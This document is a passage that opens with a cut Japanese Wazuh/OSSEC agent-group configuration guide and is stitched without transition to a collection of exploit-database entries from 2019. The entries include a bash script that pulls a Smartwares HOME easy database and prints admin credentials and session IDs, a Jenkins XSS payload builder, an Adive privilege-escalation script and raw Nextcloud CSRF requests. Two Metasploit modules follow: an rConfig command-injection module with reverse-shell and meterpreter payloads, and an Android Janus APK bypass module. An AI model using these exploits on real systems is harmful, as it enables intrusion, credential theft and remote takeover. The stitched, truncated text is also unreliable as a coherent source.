ossec.confファイルを使用してローカルで構成することも、集中構成を使用してリモートで構成することもできます。集中構成を使用する場合、それぞれが一意の構成を持つグループにプロキシを割り当てることができます。これにより、構成プロセス全体が大幅に簡素化されます。 特に指定されていない限り、すべての新しいエージェントは「デフォルト」グループに自動的に属します。インストール中にこのグループを作成し、構成ファイルを/var/ossec/etc/shared/default/folderに配置します。これらのファイルは、マネージャーからグループに属するすべてのエージェントにプッシュされます。 1.特定の構成を持つグループにプロキシを割り当てる手順を次に示します。 エージェントがマネージャーに追加されたら、Agent_GroupsツールまたはAPIを使用してグループに割り当てます。次の方法は、グループ「test01」列にID 002を含むプロキシを割り当てることです。 agent_groupsを使用してください： [root@wazhu-manage default]＃cd/var/ossec/etc/shared [root@wazhu-manage共有]＃mkdir test01 [root@wazhu-manage共有]＃/var/ossec/bin/agen

# Exploit Title: Smartwares HOME easy 1.0.9 - Client-Side Authentication Bypass # Author: LiquidWorm # Date: 2019-11-05 # Vendor: Smartwares # Product web page: https://www.smartwares.eu # Affected version: <=1.0.9 # Advisory ID: ZSL-2019-5540 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5540.php # CVE: N/A Summary: Home Easy/Smartwares are a range of products designed to remotely control your home using wireless technology. Home Easy/Smartwares is very simple to set up and allows you to operate your electrical equipment like lighting, appliances, heating etc. Desc: HOME easy suffers from information disclosure and client-side authentication bypass vulnerability through IDOR by navigating to several administrative web pages. This allowed disclosing an SQLite3 database file and location. Other functionalities are also accessible by disabling JavaScript in your browser, bypassing the client-side validation and redirection. Tested on: Boa/0.94.13 /web-en/task.html /web-en/action_task.html /web-en/plan_task.html /web-en/room.html /web-en/room_set.html /web-en/room_set2.html /web-en/scene.html /web-en/scene_set.html /web-en/scene_set2.html /web-en/system.html

# Exploit Title: Adaware Web Companion version 4.8.2078.3950 - 'WCAssistantService' Unquoted Service Path # Date: 2019-11-06 # Exploit Author: Mariela L Martínez Hdez # Vendor Homepage: https://webcompanion.com/en/ # Software Link: https://webcompanion.com/en/ # Version: Adaware Web Companion version 4.8.2078.3950 # Tested on: Windows 10 Home (64 bits) # 1. Description # Adaware Web Companion version 4.8.2078.3950 service 'WCAssistantService' has an unquoted service path. # 2. PoC C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V """" WC Assistant WCAssistantService C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe Auto C:\>sc qc WCAssistantService [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: WCAssistantService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : WC Assistant DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem # 3. Exploit # A successful attempt would require the local user to be able to insert their code in the system # root path undetected by the OS or othersecurity applications where it could potentially be executed # during application startup or reboot. If successful, the local user's code would execute with # the elevated privileges of the application.

# Title: Smartwares HOME easy 1.0.9 - Database Backup Information Disclosure # Author: LiquidWorm # Date: 2019-11-05 # Vendor: Smartwares # Product web page: https://www.smartwares.eu # Affected version: <=1.0.9 # Advisory ID: ZSL-2019-5541 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5541.php # CVE: N/A # Summary: Home Easy/Smartwares are a range of products designed to remotely # control your home using wireless technology. Home Easy/Smartwares is very # simple to set up and allows you to operate your electrical equipment like # lighting, appliances, heating etc. # # Desc: The home automation solution is vulnerable to unauthenticated database # backup download and information disclosure vulnerability. This can enable the # attacker to disclose sensitive and clear-text information resulting in authentication # bypass, session hijacking and full system control. #!/bin/bash # # ============================================================================== # root@kali:~/homeeasy# ./he_info.sh http://192.168.1.177:8004 # Target: http://192.168.1.177:8004 # Filename: 192.168.1.177:8004-16072019-db.sqlite # Username: admin # Password: s3cr3tP4ssw0rd # Version: 1.0.9 # Sessions: # ------------------------------------------------------------------ # * Ft5Mkgr5i9ywVrRH4mAECSaNJkTp5oiC0fpbuIgDIFbE83f3hGGKzIyb3krXHBsy # * Gcea4Ald4PlVGkOh23mIohGq2Da6h4mX0A8ibkm7by3QSI8TLmuaubrvGABWvWMJ # * JFU4zpdhuN4RTYgvvAhKQKqnQSvc8MAJ0nMTLYb8F6YzV7WjHe4qYlMH6aSdOlN9 # * VtOqw37a12jPdJH3hJ5E9qrc3I4YY1aU0PmIRkSJecAqMak4TpzTORWIs1zsRInd # * flR4VjFmDBSiaTmXSYQxf4CdtMT3OQxV0pQ1zwfe98niSI9LIYcO3F2nsUpiDVeH # * rCfrAvnfnl6BsLjF9FjBoNgPgvqSptcH0i9yMwN3QSDbwNHwu19ROoAVSROamRRk # ------------------------------------------------------------------ # ============================================================================== if [ "$#" -ne 1 ]; then echo "Usage: $0 http://ip:port" exit 0 fi TARGET=$1 CHECK=$(curl -Is $TARGET/data.dat 2>/dev/null | head -1 | awk -F" " '{print $2}') if [[ "$?" = "7" ]] || [[ $CHECK != "200" ]]; then echo "No juice." exit 1 fi echo "Target: "$TARGET FNAME=${TARGET:7}-$(date +"%d%m%Y") curl -s $TARGET/data.dat -o $FNAME-db.sqlite echo "Filename: $FNAME-db.sqlite" echo "Username: "$(sqlite3 $FNAME-db.sqlite "select usrname from usr") # default: admin echo "Password: "$(sqlite3 $FNAME-db.sqlite "select usrpassword from usr") # default: 111111 echo "Version: "$(sqlite3 $FNAME-db.sqlite "select option_value1 from option LIMIT 1 OFFSET 3") echo -ne "Sessions: \n" printf "%0.s-" {1..66} printf "\n" sqlite3 $FNAME-db.sqlite "select sessionid from sessiontable" | xargs -L1 echo "*" printf "%0.s-" {1..66} ; printf "\n\n"

# Exploit Title: Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting # Date: 2019-11-06 # Exploit Author: vesche (Austin Jackson) # Vendor Homepage: https://plugins.jenkins.io/build-metrics # Version: Jenkins build-metrics plugin 1.3 and below # Tested on: Debian 10 (Buster), Jenkins 2.203 (latest 2019-11-05), and build-metrics 1.3 # CVE: CVE-2019-10475 # Write-up: https://github.com/vesche/CVE-2019-10475 #!/usr/bin/env python import sys import argparse VULN_URL = '''{base_url}/plugin/build-metrics/getBuildStats?label={inject}&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search''' def get_parser(): parser = argparse.ArgumentParser(description='CVE-2019-10475') parser.add_argument('-p', '--port', help='port', default=80, type=int) parser.add_argument('-d', '--domain', help='domain', default='localhost', type=str) parser.add_argument('-i', '--inject', help='inject', default='<script>alert("CVE-2019-10475")</script>', type=str) return parser def main(): parser = get_parser() args = vars(parser.parse_args()) port = args['port'] domain = args['domain'] inject = args['inject'] if port == 80: base_url = f'http://{domain}' elif port == 443: base_url = f'https://{domain}' else: base_url = f'http://{domain}:{port}' build_url = VULN_URL.format(base_url=base_url, inject=inject) print(build_url) return 0 if __name__ == '__main__': sys.exit(main())

# Exploit Title: SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path # Date: 2019-11-08 # Exploit Author: Carlos A Garcia R # Vendor Homepage: https://www.kiwisyslog.com/ # Software Link: https://www.kiwisyslog.com/downloads # Version: 8.3.52 # Tested on: Windows XP Professional Service Pack 3 # Description: # SolarWinds Kiwi Syslog Server 8.3.52 is an affordable software to manage syslog messages, SNMP traps, and Windows event logs # PoC: # C:\>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ Kiwi Syslog Server Kiwi Syslog Server C:\Archivos de programa\Syslogd\Syslogd_Service.exe Auto # C:\>sc qc "Kiwi Syslog Server" [SC] GetServiceConfig SUCCESS SERVICE_NAME: Kiwi Syslog Server TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Archivos de programa\Syslogd\Syslogd_Service.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Kiwi Syslog Server DEPENDENCIES : SERVICE_START_NAME : LocalSystem # Exploit Using the BINARY_PATH_NAME listed above, an executable named "Archivos.exe" could be placed in "C:\", and it would be executed as the Local System user next time the service was restarted.

# Exploit Title: Adive Framework 2.0.7 - Privilege Escalation # Date: 2019-08-02 # Exploit Author: Pablo Santiago # Vendor Homepage: https://www.adive.es/ # Software Link: https://github.com/ferdinandmartin/adive-php7 # Version: 2.0.7 # Tested on: Windows 10 # CVE : CVE-2019-14347 #Exploit import requests import sys session = requests.Session() http_proxy = "http://127.0.0.1:8080" https_proxy = "https://127.0.0.1:8080" proxyDict = { "http" : http_proxy, "https" : https_proxy } print('[*****************************************]') print('[ BYPASSING Adive Framework Version.2.0.5 ]') print('[*****************************************]''\n') print('[+]Login with the correct credentials:' '\n') user = input('[+]user:') password = input('[+]password:') print('\n') url = 'http://localhost/adive/admin/login' values = {'user': user, 'password': password, } r = session.post(url, data=values, proxies=proxyDict) cookie = session.cookies.get_dict()['PHPSESSID'] print('Your session cookie is:'+ cookie +'\n') host = sys.argv[1] print('Create the new user:') userName = input('[+]User:') userUsername = input('[+]UserName:') password = input('[+]Password:') password2 = input('[+]Confirm Password:') print('The possibles permission are: 1: Administrator, 2: Developer, 3:Editor') permission = input('[+]permission:') if (password == password2): #configure proxy burp #hacer el request para la creacion de usuario data = { 'userName':userName, 'userUsername':userUsername, 'pass':password, 'cpass':password2, 'permission':permission, } headers= { 'Cookie': 'PHPSESSID='+cookie } request = session.post(host+'/adive/admin/user/add', data=data, headers=headers, proxies=proxyDict) print('+--------------------------------------------------+') else: print ('Passwords dont match!!!') #PoC https://imgur.com/dUgLYi6 https://hackpuntes.com/wp-content/uploads/2019/08/ex.gif

# Exploit Title: Nextcloud 17 - Cross-Site Request Forgery # Date: 08.11.2019 # Exploit Author: Ozer Goker # Vendor Homepage: https://nextcloud.com # Software Link: https://nextcloud.com/install/#instructions-server # Version: 17 # CVE: N/A #Nextcloud offers the industry-leading, on-premises content collaboration platform. #Our technology combines the convenience and ease of use of consumer-grade solutions like Dropbox and Google Drive with the security, privacy and control business #needs. ################################################################################################################################## # CSRF1 # Create Folder MKCOL /remote.php/dav/files/ogoker/test HTTP/1.1 Host: 192.168.2.109 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest requesttoken: NBxrV688w2KBVFx/Q+X7LsYUMGKGrj5PFNLDVe5R0bo=:ZXkTEoBkskmuOhU0NN2iab9welrLxlUkZqePH70zg/M= Connection: close Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM; nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1 ################################################################################################################################## # CSRF2 # Delete Folder DELETE /remote.php/dav/files/ogoker/test HTTP/1.1 Host: 192.168.2.109 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest requesttoken: NBxrV688w2KBVFx/Q+X7LsYUMGKGrj5PFNLDVe5R0bo=:ZXkTEoBkskmuOhU0NN2iab9welrLxlUkZqePH70zg/M= Connection: close Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM; nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1 ################################################################################################################################## # CSRF3 # Create User POST /ocs/v2.php/cloud/users HTTP/1.1 Host: 192.168.2.109 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json;charset=utf-8 requesttoken: qmO6/Dw6+bFv8FXRaFdzbhhzcVHZIGBHtg5riOIp4es=:+wbCuRNiiJpAnhyaH28qKWEXO2mUSAssxHsnwrFLs6I= Content-Length: 129 Connection: close Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM; nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1 {"userid":"test","password":"test1234","displayName":"","email":"","groups":[],"subadmin":[],"quota":"default","language":"en"} ################################################################################################################################## # CSRF4 # Delete User DELETE /ocs/v2.php/cloud/users/test HTTP/1.1 Host: 192.168.2.109 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate requesttoken: qmO6/Dw6+bFv8FXRaFdzbhhzcVHZIGBHtg5riOIp4es=:+wbCuRNiiJpAnhyaH28qKWEXO2mUSAssxHsnwrFLs6I= Connection: close Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM; nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1 ################################################################################################################################## # CSRF5 # Disable User PUT /ocs/v2.php/cloud/users/test/disable HTTP/1.1 Host: 192.168.2.109 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate requesttoken: 3uInmrIiv0aGraTESlGJCzqadH5giusD5iZ/GZwxxEQ=:j4df3516zm2pw+2PPWnQTEP+PkYt4oBolFMzU89Tlg0= Connection: close Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM; nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1 Content-Length: 0 ################################################################################################################################## # CSRF6 # Enable User PUT /ocs/v2.php/cloud/users/test/enable HTTP/1.1 Host: 192.168.2.109 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate requesttoken: 3uInmrIiv0aGraTESlGJCzqadH5giusD5iZ/GZwxxEQ=:j4df3516zm2pw+2PPWnQTEP+PkYt4oBolFMzU89Tlg0= Connection: close Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM; nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1 Content-Length: 0 ################################################################################################################################## # CSRF7 # Create Group POST /ocs/v2.php/cloud/groups HTTP/1.1 Host: 192.168.2.109 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json;charset=utf-8 requesttoken: EjdL6QpK1LpIlTtWYWHqEa3p8UKwRqDbBraFa+WWRbE=:Q1IzrCUSpZFn+3IdFlmzVtSNu3r9LsuwdMPJIbb0F/g= Content-Length: 18 Connection: close Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; redirect=1; testing=1 {"groupid":"test"} ################################################################################################################################## # CSRF8 # Delete Group DELETE /ocs/v2.php/cloud/groups/test HTTP/1.1 Host: 192.168.2.109 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate requesttoken: EjdL6QpK1LpIlTtWYWHqEa3p8UKwRqDbBraFa+WWRbE=:Q1IzrCUSpZFn+3IdFlmzVtSNu3r9LsuwdMPJIbb0F/g= Connection: close Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; redirect=1; testing=1 ################################################################################################################################## # CSRF9 # Change User Full Name PUT /settings/users/ogoker/settings HTTP/1.1 Host: 192.168.2.109 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json requesttoken: nvnWCslz6So+9VRA8Vg8043tt1pf1wL/ysi2ak1J6es=:z5yuT+YrmAERmx0LhmBllPSJ/WISv2mUuL36IB4ru6I= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Content-Length: 266 Connection: close Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; redirect=1; testing=1 {"displayname":"Ozer Goker","displaynameScope":"contacts","phone":"","phoneScope":"private","email":"","emailScope":"contacts","website":"","websiteScope":"private","twitter":"","twitterScope":"private","address":"","addressScope":"private","avatarScope":"contacts"} ################################################################################################################################## # CSRF10 # Change User Email PUT /settings/users/ogoker/settings HTTP/1.1 Host: 192.168.2.109 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json requesttoken: I+6bC+nRvx4TyTudd4pzZrOucr8qlgwe0YE3v13+fOw=:covjTsaJzjU8p3LWALIqIcrKOIdn/md1o/R79Q6cLqU= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Content-Length: 271 Connection: close Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; redirect=1; testing=1 {"displayname":"ogoker","displaynameScope":"contacts","phone":"","phoneScope":"private","email":"test@test ","emailScope":"contacts","website":"","websiteScope":"private","twitter":"","twitterScope":"private","address":"","addressScope":"private","avatarScope":"contacts"} ################################################################################################################################## # CSRF11 # Change Language PUT /ocs/v2.php/cloud/users/ogoker HTTP/1.1 Host: 192.168.2.109 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 requesttoken: mRN2MXrwRQuE/fuQ5PNtyp4ulgYRocB99vbydSi8i+E=:yHYOdFWoNCCrk7Lbk8s0jedK3D5cyasWhIO+P3ve2ag= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Content-Length: 21 Connection: close Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; redirect=1; testing=1 key=language&value=tr ################################################################################################################################## # CSRF12 # Change User Password POST /settings/personal/changepassword HTTP/1.1 Host: 192.168.2.109 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 requesttoken: 0OhP82O7tEe/0gbwiEPrkFfuU9StyaiXNi0yqg02wT4=:gY03tkzjxWyQvE+7/3uy1y6KGezgocP8RFh+4F5Uk3c= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Content-Length: 70 Connection: close Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; redirect=1; testing=1 oldpassword=abcd1234&newpassword=12345678&newpassword-clone=12345678 ##################################################################################################################################

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'rConfig install Command Execution', 'Description' => %q{ This module exploits an unauthenticated command injection vulnerability in rConfig versions 3.9.2 and prior. The `install` directory is not automatically removed after installation, allowing unauthenticated users to execute arbitrary commands via the `ajaxServerSettingsChk.php` file as the web server user. This module has been tested successfully on rConfig version 3.9.2 on CentOS 7.7.1908 (x64). }, 'License' => MSF_LICENSE, 'Author' => [ 'mhaskar', # Discovery and exploit 'bcoles' # Metasploit ], 'References' => [ ['CVE', '2019-16662'], ['EDB', '47555'], ['URL', 'https://gist.github.com/mhaskar/ceb65fa4ca57c3cdccc1edfe2390902e'], ['URL', 'https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/'] ], 'Platform' => %w[unix linux], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Payload' => {'BadChars' => "\x00\x0a\x0d\x26"}, 'Targets' => [ ['Automatic (Unix In-Memory)', 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'}, 'Type' => :unix_memory ], ['Automatic (Linux Dropper)', 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'DefaultOptions' => {'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'}, 'Type' => :linux_dropper ] ], 'Privileged' => false, 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 }, 'DisclosureDate' => '2019-10-28', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to rConfig install directory', '/install/']) ]) end def check res = execute_command('id') unless res vprint_error 'Connection failed' return CheckCode::Unknown end if res.code == 404 vprint_error 'Could not find install directory' return CheckCode::Safe end cmd_res = res.body.scan(%r{The root details provided have not passed: (.+?)<\\/}).flatten.first unless cmd_res return CheckCode::Safe end vprint_status "Response: #{cmd_res}" unless cmd_res.include?('uid=') return CheckCode::Detected end CheckCode::Vulnerable end def execute_command(cmd, opts = {}) vprint_status "Executing command: #{cmd}" send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxServerSettingsChk.php'), 'vars_get' => {'rootUname' => ";#{cmd} #"} }, 5) end def exploit unless [CheckCode::Detected, CheckCode::Vulnerable].include? check fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable" end case target['Type'] when :unix_memory execute_command(payload.encoded) when :linux_dropper execute_cmdstager(:linemax => 1_500) end end end

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core/payload/apk' class MetasploitModule < Msf::Exploit::Local Rank = ManualRanking include Msf::Exploit::FileDropper include Msf::Post::File include Msf::Post::Android::Priv include Msf::Payload::Android def initialize(info={}) super( update_info( info, { 'Name' => "Android Janus APK Signature bypass", 'Description' => %q{ This module exploits CVE-2017-13156 in Android to install a payload into another application. The payload APK will have the same signature and can be installed as an update, preserving the existing data. The vulnerability was fixed in the 5th December 2017 security patch, and was additionally fixed by the APK Signature scheme v2, so only APKs signed with the v1 scheme are vulnerable. Payload handler is disabled, and a multi/handler must be started first. }, 'Author' => [ 'GuardSquare', # discovery 'V-E-O', # proof of concept 'timwr', # metasploit module 'h00die', # metasploit module ], 'References' => [ [ 'CVE', '2017-13156' ], [ 'URL', 'https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-attackers-modify-apps-without-affecting-their-signatures' ], [ 'URL', 'https://github.com/V-E-O/PoC/tree/master/CVE-2017-13156' ], ], 'DisclosureDate' => 'Jul 31 2017', 'SessionTypes' => [ 'meterpreter' ], 'Platform' => [ 'android' ], 'Arch' => [ ARCH_DALVIK ], 'Targets' => [ [ 'Automatic', {} ] ], 'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp', 'AndroidWakelock' => false, # the 